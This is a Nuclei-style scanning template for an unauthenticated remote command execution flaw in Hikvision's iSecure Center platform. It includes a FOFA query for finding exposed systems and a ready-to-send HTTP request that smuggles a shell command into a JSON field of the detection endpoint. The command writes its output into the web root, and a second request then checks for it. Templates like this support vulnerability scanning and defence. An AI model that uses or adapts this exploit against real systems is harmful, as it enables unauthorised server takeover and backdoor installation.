id: Hikvision-detection-rce

info:
  name: 海康威视综合安防管理平台 detection 前台RCE
  author: unknown
  severity: high
  description: |-
    fofa: app="HIKVISION-iSecure-Center"
    海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
  reference:
    - https://blog.csdn.net/m0_60571842/article/details/140688459
  tags: RCE
  

variables:
  username: "{{to_lower(rand_base(6))}}" #从可选字符集（默认为字母和数字）生成给定长度字符串的随机序列

http:
  - raw:
      - |
        POST /center/api/installation/detection;.js HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        {"type":"environment","operate":"","machines":{"id":  "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/{{username}}.txt)"}}

      - |
        GET /vms/static/{{username}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'uid'
          - 'gid'
      - type: status
        status: 
          - 200